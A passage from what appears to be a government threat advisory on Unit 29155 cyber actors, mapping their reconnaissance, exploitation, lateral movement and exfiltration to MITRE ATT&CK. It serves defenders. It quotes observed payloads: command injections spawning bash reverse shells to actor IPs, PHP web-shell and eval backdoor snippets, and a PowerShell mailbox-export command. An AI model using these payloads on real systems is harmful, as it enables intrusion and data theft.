<li><strong>Shodan:</strong> Unit 29155 cyber actors used Shodan to identify hosts with a specific set of vulnerabilities or device types [<a href="https://attack.mitre.org/versions/v15/techniques/T1596/005/" title="Search Open Technical Databases: Scan Databases">T1596.005</a>].[<a href="https://help.shodan.io/the-basics/what-is-shodan" title="What is Shodan?">12</a>]</li>
<li><strong>VirusTotal</strong>[<a href="https://docs.virustotal.com/docs/how-it-works" title="How it works">13</a>]</li>
<li><strong>WPScan</strong></li>
</ul>
<p>Additionally, Unit 29155 cyber actors have used infrastructure configured with OpenVPN configuration [<a href="https://attack.mitre.org/versions/v15/techniques/T1572/" title="Protocol Tunneling">T1572</a>] over port 1194, and in some instances, to perform Active Directory (AD) enumeration<a>. </a>Adminer in combination with <a href="https://attack.mitre.org/versions/v15/software/S0357/" title="Impacket">Impacket</a> and ldapdomaindump were tools used for gathering information on AD. Once active devices are found, Unit 29155 cyber actors look for vulnerabilities to exploit. For example, the Acunetix vulnerability scanning tool has been used for gathering information on potential vulnerabilities such as blind cross-site scripting, as shown in the following commands:</p>
<p><code>GET /index.php?log=to@example.com&gt;%0d%0abcc:009247.3183-377.3183.1bf6c.19446.2@bxss.me</code></p>
<p><code>"GET /CMS/files/log.htm HTTP/1.1" * * "(nslookup hitccruvbrumn76c1b.bxss.me||perl -e \"gethostbyname('hitccruvbrumn76c1b.bxss.me')\")"</code></p>
<p>As the cyber actors perform reconnaissance on victim networks and discover vulnerabilities within victim web servers or machines, they obtain CVE exploit scripts from GitHub repositories and use them against victim infrastructure [<a href="https://attack.mitre.org/versions/v15/techniques/T1588/005/">T1588.005</a>]. Unit 29155 cyber actors have been observed obtaining the respective exploit scripts for, but not exploiting,<strong> </strong>the following CVEs:</p>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-1472" title="CVE-2020-1472 Detail">CVE-2020-1472</a> (Microsoft: Windows Server)</li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-26084" title="CVE-2021-26084 Detail">CVE-2021-26084</a> (Atlassian Confluence Server and Data Center)</li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-3156" title="CVE-2021-3156 Detail">CVE-2021-3156</a> (Red Hat: Privilege Escalation via Command Line Argument Parsing)</li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-4034" title="CVE-2021-4034 Detail">CVE-2021-4034</a> (Red Hat: Polkit Privilege Escalation)</li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2022-27666" title="CVE-2022-27666 Detail">CVE-2022-27666</a> (Red Hat: Heap Buffer Overflow Flaw)</li>
</ul>
<p>Analysis concluded Unit 29155 cyber actors have exploited the following CVEs for initial access [<a href="https://attack.mitre.org/versions/v15/techniques/T1190/">T1190</a>], as detailed throughout this advisory:</p>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-33044" title="CVE-2021-33044 Detail">CVE-2021-33044</a> (Dahua Security)</li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-33045" title="CVE-2021-33045 Detail">CVE-2021-33045</a> (Dahua Security)</li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2022-26134" title="CVE-2022-26134 Detail">CVE-2022-26134</a> (Atlassian Confluence Server and Data Center)</li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2022-26138" title="CVE-2022-26138 Detail">CVE-2022-26138</a> (Atlassian Confluence Server and Data Center)</li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2022-3236" title="CVE-2022-3236 Detail">CVE-2022-3236</a> (Sophos: Firewall)</li>
</ul>
<h4><strong>Resource Development</strong></h4>
<p>Rather than build custom solutions, Unit 29155 cyber actors use common red teaming techniques and publicly available tools to conduct cyber operations. As a result, many TTPs overlap with those of other cyber actors, which can lead to misattribution.</p>
<p>Unit 29155 actors and their cyber-criminal affiliates commonly maintain accounts on dark web forums; this has provided the opportunity to obtain various hacker tools such as malware and malware loaders [<a href="https://attack.mitre.org/versions/v15/techniques/T1588/001/" title="Obtain Capabilities: Malware">T1588.001</a>] like Raspberry Robin and SaintBot. While Unit 29155 cyber actors are best known for their use of WhisperGate malware against Ukraine, the use of WhisperGate is not unique to the group. Technical analysis can be found in <strong>Appendix A: WhisperGate Malware Analysis</strong>.</p>
<h4><strong>Initial Access</strong></h4>
<p>Unit 29155 cyber actors are known to use VPNs to anonymize their operational activity. These cyber actors commonly attempt to exploit weaknesses in internet-facing systems, like the CVEs listed above, to initially access networks. In one instance, Unit 29155 cyber actors exploited CVE-2021-33044 and CVE-2021-33045 on Dahua IP cameras to bypass identity authentication.</p>
<h4><strong>Lateral Movement</strong></h4>
<p>Unit 29155 cyber actors have used Shodan to scan for Internet of Things (IoT) devices, using exploitation scripts to authenticate to IP cameras with default usernames and passwords [<a href="https://attack.mitre.org/versions/v15/techniques/T1078/001/" title="Valid Accounts: Default Accounts">T1078.001</a>], and exfiltrating images [<a href="https://attack.mitre.org/versions/v15/techniques/T1125/" title="Video Capture">T1125</a>] (JPG files). Attempts are then made to perform remote command execution via web to vulnerable IP cameras; if successful, cyber actors would dump configuration settings and credentials in plaintext (as shown in <strong>Table 1</strong> below) [<a href="https://attack.mitre.org/versions/v15/techniques/T1552/001/" title="Unsecured Credentials: Credentials In Files">T1552.001</a>].</p>
<p><strong>Appendix B: Indicators of Compromise</strong> lists threat actor IP addresses associated with the activity detailed in this section.</p>
<p><strong>Note:</strong> These events are independent and not correlated as a single timeline of compromise.</p>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Event</th>
<th role="columnheader">Victim Observation</th>
</tr>
</thead>
<tbody>
<tr>
<td>Web requests observed from victim infrastructure</td>
<td>
<p>These requests are likely intended to dump configuration settings and credentials [<a href="https://attack.mitre.org/versions/v15/techniques/T1003/" title="OS Credential Dumping">T1003</a>]:</p>
<p><code>hxxp://&lt;IP&gt;:&lt;port&gt;/PictureCatch.cgi?username=&lt;NAME&gt;&amp;password=%3becho%20%22%3c%21--%23include%20file=%22SYS_CFG%22--%3e%22%3etmp/Login.htm%3b&amp;data_type=1&amp;attachment=1&amp;channel=1&amp;secret=1&amp;key=PWNED</code></p>
<p><code>hxxp://&lt;IP&gt;:&lt;port&gt;/ssi.cgi/tmp/Login.htm</code></p>
</td>
</tr>
<tr>
<td>POST requests sent to victims with payloads [<a href="https://attack.mitre.org/versions/v15/techniques/T1071/001/" title="Application Layer Protocol: Web Protocols">T1071.001</a>]</td>
<td>
<p><code>"txtUser=lol&amp;txtPassword=2&amp;btConnect=Piesl%C4%93gtiesbtConnect=Piesl%C4%93gties&amp;chRemember=on&amp;txtPassword=g00dPa%24%24w0rD&amp;txtUser=$%7b@print(system(%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F179.43.175.38%2F6870%200%3E%261%22))%7d"</code></p>
<p><code>"txtUser=lol&amp;txtPassword=2&amp;btConnect=Piesl%C4%93gtiesbtConnect=Piesl%C4%93gties&amp;chRemember=on&amp;txtPassword=g00dPa%24%24w0rD&amp;txtUser=$%7b@print(system(%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F81.17.24.130%2F6870%200%3E%261%22))%7d"</code></p>
</td>
</tr>
<tr>
<td>URL encoded values from txtUser for both commands decoded to embedded bash commands</td>
<td>
<p><code>${@print(system("bash -i &gt;&amp; /dev/tcp/179.43.175.38/6870 0&gt;&amp;1"))}</code></p>
<p><code>${@print(system("bash -i &gt;&amp; /dev/tcp/81.17.24.130/6870 0&gt;&amp;1"))}</code></p>
</td>
</tr>
</tbody>
</table>
<p>In addition, incident analysis identified the general observations listed below on victim infrastructure. Each event should be considered independent and may have been used by Unit 29155 cyber actors against multiple victims at different dates and timeframes. <strong>Appendix B: Indicators of Compromise</strong> lists IOCs associated with the observations in <strong>Table 1</strong> and below.</p>
<ul>
<li>In one instance shortly following a deployment of WhisperGate malware, Unit 29155 cyber actors exfiltrated data to <code>mega[.]nz</code> using <a href="https://attack.mitre.org/versions/v15/software/S1040/" title="Rclone">Rclone</a> [<a href="https://attack.mitre.org/versions/v15/techniques/T1567/002/" title="Exfiltration Over Web Service: Exfiltration to Cloud Storage">T1567.002</a>].</li>
<li>Unit 29155 cyber actors used a Pass-the-Hash [<a href="https://attack.mitre.org/versions/v15/techniques/T1550/002/" title="Use Alternate Authentication Material: Pass the Hash">T1550.002</a>] via ProxyChains.</li>
<li>Cyber actors performed SSH and SSHPass executions.</li>
<li>Cyber actors initiated a web request and executed commands via ProxyChains. This included obtaining NT hashes via Server Message Block (SMB) using smbclient, executing Windows Management Instrumentation (WMI) with hashes, and making web requests with resources <code>i.php</code> and <code>tunnel.jsp</code>. In one instance, cyber actors used smbclient via ProxyChains to access internal network shares, and subsequently PSQL and MySQL clients to access internal databases.</li>
<li>Cyber actors used Impacket for post-exploitation and lateral movement. The script <code>secretsdump.py</code> was used from the Impacket framework to obtain domain credentials, while <code>psexec.py</code> was subsequently used to move laterally within a victim network. </li>
<li>Cyber actors used <code>ntlmrelayx.py</code> via Impacket and <code>krbrelayx.py</code>, which requires Impacket to function.</li>
<li>Cyber actors used <code>Responder.py</code>.</li>
<li>Cyber actors used <code>su-bruteforce</code> to brute force a selected user using the <code>su</code> command.</li>
<li>Cyber actors used <a href="https://attack.mitre.org/software/S0521/" title="BloodHound">BloodHound</a>, an open source AD reconnaissance tool that can reveal hidden relationships and identify attack paths within an AD environment.</li>
<li>Cyber actors used CrackMapExec via ProxyChains with SMB protocol targeting internal victim IP addresses. This open source post-exploitation tool automates assessing the security of large AD networks.</li>
<li>Cyber actors used <code>LinPEAS</code>, an open source script designed to automate the process of searching for potential privilege escalation vulnerabilities on a Linux victim.</li>
<li>Cyber actors used GO Simple Tunnel (GOST) (MD5: <code>896e0f54fc67d72d94b40d7885f10c51</code>) for 30 days within one incident and against additional victims on various occasions. GOST is a tunneling tool designed to establish secure connections between clients and servers, allowing for secure data transmission over untrusted networks.</li>
<li>Cyber actors used Through the Wire against a victim’s internet-facing Confluence server. Through the Wire is a proof of concept[<a href="https://github.com/jbaines-r7/through_the_wire" title="jbaines-r7 / through_the_wire">14</a>] exploit for CVE-2022-26134, an OGNL injection vulnerability allowing an unauthenticated user to execute arbitrary code on a Confluence Server or Data Center instance. All versions of Confluence Server and Data Center prior to the fixed versions listed by Atlassian are affected by this vulnerability.[<a href="https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html" title="Confluence Server and Data Center - CVE-2022-26134 - Critical severity unauthenticated remote code execution vulnerability">15</a>] A reverse shell over HTTPS was used to communicate over listening host on port <code>8081</code>.</li>
<li>Cyber actors initiated Nmap scans on localized web servers.</li>
<li>Cyber actors performed lateral movement from compromised web servers to exploit a corporate Microsoft Windows network, commonly using <code>psexec.py</code> from the Impacket framework. The script <code>secretsdump.py</code> from the Impacket framework was used to obtain domain credentials.</li>
<li>Cyber actors may have used Raspberry Robin malware in the role of an access broker [<a href="https://attack.mitre.org/versions/v15/techniques/T1588/001/" title="Obtain Capabilities: Malware">T1588.001</a>].</li>
<li>Cyber actors targeted victims’ Microsoft Outlook Web Access (OWA) infrastructure with password spraying to obtain valid usernames and passwords [<a href="https://attack.mitre.org/versions/v15/techniques/T1110/003/" title="Brute Force: Password Spraying">T1110.003</a>].</li>
</ul>
<h3>Command and Control</h3>
<h4><strong>Infrastructure</strong></h4>
<p>Since at least 2020, Unit 29155 cyber actors have used virtual private servers (VPSs) [<a href="https://attack.mitre.org/versions/v15/techniques/T1583/003/" title="Acquire Infrastructure: Virtual Private Server">T1583.003</a>] to host their operational tools, perform reconnaissance, exploit victim infrastructure, and exfiltrate victim data. Use of VPSs are common due to the associated IP addresses not identifying their true country of origin.</p>
<h4><strong>Post-Exploitation</strong></h4>
<div class="WordSection1">
<p>When an exploit is successfully executed on a victim system, the actors can then launch a Meterpreter payload [<a href="https://attack.mitre.org/versions/v15/techniques/T1105/" title="Ingress Tool Transfer">T1105</a>], which commonly uses a reverse Transmission Control Protocol (TCP) connection to initiate communication with the threat actors’ infrastructure [<a href="https://attack.mitre.org/versions/v15/techniques/T1095/" title="Non-Application Layer Protocol">T1095</a>]. In one instance, an established reverse TCP session was observed from victim to actor infrastructure via the following ports:</p>
<ul>
<li>1234</li>
<li>1851</li>
<li>43221</li>
<li>443</li>
<li>4444</li>
<li>4688</li>
<li>5432</li>
<li>8080</li>
<li>8081</li>
<li>8082</li>
<li>8084</li>
<li>8085</li>
<li>8088</li>
<li>8089</li>
<li>8090</li>
<li>8443</li>
<li>8487</li>
<li>8888</li>
</ul>
<p>Additional observations were collected from victim engagement and analysis, including:</p>
<ul>
<li>Use of the Metasploit Framework to search for and/or access modules such as <code>mysql</code>, <code>postgres</code>, and <code>ssh</code> software and features.</li>
<li>Use of Meterpreter and Netcat to execute reverse shells over ports such as 8081.</li>
<li>Use of Impacket.</li>
<li>Use of PHP (<code>exp_door v1.0.2</code>, <code>b374k</code>, <code>WSO 4.0.5</code>) and the <a href="https://attack.mitre.org/versions/v15/software/S0598/" title="P.A.S. Webshell">P.A.S.</a> web shells [<a href="https://attack.mitre.org/versions/v15/techniques/T1505/003/" title="Server Software Component: Web Shell">T1505.003</a>], likely for initial access.</li>
<li>Use of EternalBlue.[<a href="https://learn.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010" title="Microsoft Security Bulletin MS17-010 - Critical">16</a>],[<a href="https://www.avast.com/c-eternalblue" title="What Is EternalBlue and Why Is the MS17-010 Exploit Still Relevant?">17</a>]</li>
<li>Use of reGeorg or Neo-reGeorg to set up a proxy to tunnel network traffic following compromise of a victim website, as well as use of ProxyChains to run Nmap within the network.</li>
</ul>
<h4><strong>Encrypted Communication</strong></h4>
<p>Once Unit 29155 cyber actors gain access to the victims’ internal network, the victims have observed:</p>
<ol>
<li>Using Domain Name System (DNS) tunneling tools, such as dnscat/2 and Iodine, to tunnel IPv4 network traffic [<a href="https://attack.mitre.org/versions/v15/techniques/T1071/004/" title="Application Layer Protocol: DNS">T1071.004</a>]. For example, Iodine was used to tunnel data via <code>dns.test658324901domain.me</code>.</li>
<li>Configuring a proxy within the victim infrastructure and executing commands within the network via ProxyChains. ProxyChains—a tool used to route internal traffic through a series of proxies [<a href="https://attack.mitre.org/versions/v15/techniques/T1090/003/" title="Proxy: Multi-hop Proxy">T1090.003</a>]—has been used to provide further anonymity and modify system configuration to force network traffic through chains of SOCKS5 proxies and respective ports. The following ports used by actor infrastructure include:
<ol>
<li>1080</li>
<li>1333</li>
<li>13381</li>
<li>13391</li>
<li>13666</li>
<li>13871</li>
<li>1448</li>
<li>1888</li>
<li>3130</li>
<li>3140</li>
<li>4337</li>
<li>50001</li>
<li>8079</li>
</ol>
</li>
<li>Using the GOST open source tunneling tool (via SOCKS5 proxy) named <code>java</code>, as detailed in the following running processes in victim incident response results:</li>
</ol>
<p><code>8212 - SJ 0:02.54 HISTFILE=/dev/null</code><br><code>PATH=/sbin:/bin:/usr/sbin:/usr/bin</code><br><code>LD_LIBRARY_PATH=/usr/local/lib:/usr/local/lib OLDPWD=/tmp</code><br><code>PWD=/tmp/.ICE-unix HOME=/ RC PID=33980 ./java –L</code><br><code>socks5://127.0.0.1:13338</code></p>
<p><code>8282 - IJ 0:03.98 HISTFILE=/dev/null</code><br><code>PATH=/sbin:/bin:/usr/sbin:/usr/bin</code><br><code>LD_LIBRARY_PATH=/usr/local/lib:/usr/local/lib OLDPWD=/tmp</code><br><code>PWD=/tmp/.ICE-unix HOME=/ RC_PID=33980 ./java –L</code><br><code>rtcp://0.0.0.0:13381/127.0.0.1:13338 -F socks5://{IP Address}:7896</code></p>
<ol>
<li>Modifying .php scripts to manipulate server-side operations, such as the observations listed in <strong>Table 2</strong> below.</li>
</ol>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Script (Base64 Decoded)</th>
<th role="columnheader">Command</th>
<th role="columnheader">Purpose </th>
</tr>
</thead>
<tbody>
<tr>
<td>usr/local/www/apache24/data/-redacted-/plugins/extension/oomla/oomla.php</td>
<td>
<p><code>if (isset($ POST ["sessionsid_wp"] ))</code></p>
<p><code>{</code></p>
<p><code>$poll id = $ POST ["sessionsid_wp") ;</code></p>
<p><code>$sessii = explode(":",</code></p>
<p><code>base64_decode($poll_id)) ;$sock=fsockopen($sessii[O) ,$sessii[l));</code></p>
<p><code>$proc=proc_open(/bin/sh -i), array(O=&gt;$sock, l=&gt;$sock,</code></p>
<p><code>2=&gt;$sock) ,$pipes);</code></p>
<p><code>}</code></p>
</td>
<td>Creates session.</td>
</tr>
<tr>
<td>Usr/local/www/apache24/data/-redacted-/plugins/authentication/joomla/oomla.php</td>
<td>
<p><code>function nb_res($a)</code></p>
<p><code>{</code></p>
<p><code>eval(system('base64 decode ($a) ');</code></p>
<p><code>}</code></p>
</td>
<td>Allows program to run.</td>
</tr>
<tr>
<td>Usr/local/www/apache24/data/-redacted-/plugins/privacy/contact/contact.php</td>
<td>
<p><code>if (isset($_POST['fl']))</code></p>
<p><code>{</code></p>
<p><code>$fl=$_POST['fl'] ;</code></p>
<p><code>$f2=$_POST['f2'] ;</code></p>
<p><code>$content = base64 decode($fl);</code></p>
<p><code>$h = fopen($f2."w");</code></p>
<p><code>$text = "$content";</code></p>
<p><code>fwrite($h.$text) ;</code></p>
<p><code>fclose ($h) ;</code></p>
<p><code>}</code></p>
</td>
<td>Allows writing to files.</td>
</tr>
</tbody>
</table>
<p>Exfiltration</p>
<p>In several instances, analysis identified Unit 29155 cyber actors compressing victim data [<a href="https://attack.mitre.org/versions/v15/techniques/T1560/" title="Archive Collected Data">T1560</a>] (e.g., the entire filesystem, select file system artifacts or user data, and/or database dumps) to send back to their infrastructure. These cyber actors commonly use the command-line program Rclone to exfiltrate data to a remote location from victim infrastructure.</p>
<p>Unit 29155 cyber actors have exfiltrated Windows processes and artifacts, such as Local Security Authority Subsystem Service (LSASS) memory dumps [<a href="https://attack.mitre.org/versions/v15/techniques/T1003/001/">T1003.001</a>], Security Accounts Manager (SAM) files [<a href="https://attack.mitre.org/versions/v15/techniques/T1003/002/" title="OS Credential Dumping: Security Account Manager">T1003.002</a>], and SECURITY and SYSTEM event log files [<a href="https://attack.mitre.org/versions/v15/techniques/T1654/" title="Log Enumeration">T1654</a>]. As seen in victim incident response results, actor infrastructure has also been used to compromise multiple mail servers [<a href="https://attack.mitre.org/versions/v15/techniques/T1114/" title="Email Collection">T1114</a>] and exfiltrate mail artifacts, such as email messages, using PowerShell [<a href="https://attack.mitre.org/versions/v15/techniques/T1059/001/" title="Command and Scripting Interpreter: PowerShell">T1059.001</a>] via the following command:</p>
<p><code>powershell New-MailboxExportRequest – Mailbox &lt;resource&gt; – FilePath `\\{IP Address}\sharefolder\1.pst`</code></p>
<h2><strong>MITRE ATT&amp;CK Tactics and Techniques</strong></h2>
<p>See <strong>Table 3 to Table 14</strong> for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&amp;CK framework, see CISA and MITRE ATT&amp;CK’s <a href="https://www.cisa.gov/news-events/news/best-practices-mitre-attckr-mapping" title="Best Practices for MITRE ATT&amp;CK Mapping">Best Practices for MITRE ATT&amp;CK Mapping</a> and CISA’s <a href="https://github.com/cisagov/Decider/" title="cisagov / decider">Decider Tool</a>.</p>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 3: Reconnaissance</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Gather Victim Network Information: DNS</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T1590/002/" title="Gather Victim Network Information: DNS">T1590.002</a></td>
<td>Unit 29155 cyber actors have used Amass and VirusTotal to obtain information about victims’ DNS for possible use during targeting, such as subdomains for target websites.</td>
</tr>
<tr>
<td>Active Scanning</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T1595/" title="Active Scanning">T1595</a></td>
<td>Unit 29155 cyber actors use publicly available tools to gather information for possible use during targeting.</td>
</tr>
<tr>
<td>Active Scanning: Scanning IP Blocks</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T1595/001/" title="Active Scanning: Scanning IP Blocks">T1595.001</a></td>
<td>Unit 29155 cyber actors use various open source scanning tools to scan for victim IP ranges.</td>
</tr>
<tr>
<td>Active Scanning: Vulnerability Scanning</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T1595/002/" title="Active Scanning: Vulnerability Scanning">T1595.002</a></td>
<td>Unit 29155 cyber actors use publicly available scanning tools to enable their discovery of IoT devices and exploitable vulnerabilities. Tools leveraged for scanning include Acunetix, Amass, Droopescan, eScan, and JoomScan.</td>
</tr>
<tr>
<td>Search Open Technical Databases: Scan Databases</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T1596/005/" title="Search Open Technical Databases: Scan Databases">T1596.005</a></td>
<td>Unit 29155 cyber actors use publicly available platforms like Shodan to identify internet connected hosts.</td>
</tr>
</tbody>
</table>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 4: Resource Development</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Acquire Infrastructure: Virtual Private Server</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T1583/003/" title="Acquire Infrastructure: Virtual Private Server">T1583.003</a></td>
<td>Unit 29155 cyber actors have used VPSs to host their operational tools, perform reconnaissance, exploit victim infrastructure, and exfiltrate victim data.</td>
</tr>
<tr>
<td>Obtain Capabilities: Malware</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T1588/001/" title="Obtain Capabilities: Malware">T1588.001</a></td>
<td>Unit 29155 cyber actors obtain publicly available malware and malware loaders to support their operations. For example, analysis suggests Raspberry Robin malware may have been used in the role of an access broker.</td>
</tr>
<tr>
<td>Obtain Capabilities: Exploits</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T1588/005/" title="Obtain Capabilities: Exploits">T1588.005</a></td>
<td>Unit 29155 cyber actors are known to obtain CVE exploit scripts from GitHub repositories and use them against victim infrastructure.</td>
</tr>
</tbody>
</table>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 5: Initial Access</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Technique Title</th>
<th role="columnheader">ID</th>
<th colspan="2" role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Valid Accounts: Default Accounts</td>
<td colspan="2"><a href="https://attack.mitre.org/versions/v15/techniques/T1078/001/" title="Valid Accounts: Default Accounts">T1078.001</a></td>
<td>Unit 29155 cyber actors use exploitation scripts to authenticate to IP cameras with default usernames and passwords.</td>
</tr>
<tr>
<td>Exploit Public-Facing Application</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T1190/" title="Exploit Public-Facing Application">T1190</a></td>
<td colspan="2">
<p>Unit 29155 cyber actors have used a variety of public exploits, including CVE-2021-33044, CVE-2021-33045, CVE-2022-26134, and CVE-2022-26138.</p>
<p>The proof of concept exploit for CVE-2022-26134, Through the Wire, has also been used against a victim’s internet-facing Confluence server.</p>
</td>
</tr>
</tbody>
</table>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 6: Execution</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Command and Scripting Interpreter: PowerShell</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T1059/001/" title="Command and Scripting Interpreter: PowerShell">T1059.001</a></td>
<td>Unit 29155 cyber actors have used PowerShell to execute commands and other operational tasks.</td>
</tr>
</tbody>
</table>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 7: Persistence</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Server Software Component: Web Shell</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T1505/003/" title="Server Software Component: Web Shell">T1505.003</a></td>
<td>Unit 29155 cyber actors use web shells to establish persistent access to systems.</td>
</tr>
</tbody>
</table>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 8: Credential Access</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>OS Credential Dumping: LSASS Memory</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T1003/001/" title="OS Credential Dumping: LSASS Memory">T1003.001</a></td>
<td>Unit 29155 cyber actors have exfiltrated LSASS memory dumps to retrieve credentials from victim machines.</td>
</tr>
<tr>
<td>OS Credential Dumping: Security Account Manager</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T1003/002/" title="OS Credential Dumping: Security Account Manager">T1003.002</a></td>
<td>Unit 29155 cyber actors have exfiltrated usernames and hashed passwords from the SAM.</td>
</tr>
<tr>
<td>Brute Force: Password Spraying</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T1110/003/" title="Brute Force: Password Spraying">T1110.003</a></td>
<td>Unit 29155 cyber actors targeted victims’ Microsoft OWA infrastructure with password spraying to obtain valid usernames and passwords.</td>
</tr>
<tr>
<td>Unsecured Credentials: Credentials in Files</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T1552/001/" title="Unsecured Credentials: Credentials in Files">T1552.001</a></td>
<td>Following exploitation of vulnerable IP cameras, Unit 29155 cyber actors dump configuration settings and credentials in plaintext.</td>
</tr>
</tbody>
</table>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 9: Discovery</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Network Service Discovery</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T1046/" title="Network Service Discovery">T1046</a></td>
<td>Once Unit 29155 cyber actors gained access to victim internal networks, they further used Nmap (via the NSE) to write custom scripts for discovering and scanning other machines.</td>
</tr>
<tr>
<td>Log Enumeration</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T1654/" title="Log Enumeration">T1654</a></td>
<td>Unit 29155 cyber actors have enumerated and exfiltrated SECURITY and SYSTEM logs.</td>
</tr>
</tbody>
</table>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 10: Lateral Movement</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Use Alternate Authentication Material: Pass the Hash</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T1550/002/" title="Use Alternate Authentication Material: Pass the Hash">T1550.002</a></td>
<td>Unit 29155 cyber actors used Pass-the-Hash to authenticate via SMB.</td>
</tr>
</tbody>
</table>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 11: Collection</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Email Collection</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T1114/" title="Email Collection">T1114</a></td>
<td>Unit 29155 cyber actors have used their infrastructure to compromise multiple victims’ mail servers and exfiltrate mail artifacts, such as email messages.</td>
</tr>
<tr>
<td>Video Capture</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T1125/" title="Video Capture">T1125</a></td>
<td>Unit 29155 cyber actors have exploited IoT devices, specifically IP cameras with default usernames and passwords, and exfiltrated images.</td>
</tr>
<tr>
<td>Data from Information Repositories: Confluence</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T1213/001/" title="Data from Information Repositories: Confluence">T1213.001</a></td>
<td>Unit 29155 cyber actors leveraged Through the Wire against the victim’s internet-facing Confluence server.</td>
</tr>
<tr>
<td>Archive Collected Data</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T1560/" title="Archive Collected Data">T1560</a></td>
<td>Unit 29155 cyber actors compress victim data (e.g., the entire filesystem, select file system artifacts or user data, and/or database dumps) to send back to their infrastructure.</td>
</tr>
</tbody>
</table>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 12: Command and Control</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Proxy: Multi-hop Proxy</td>
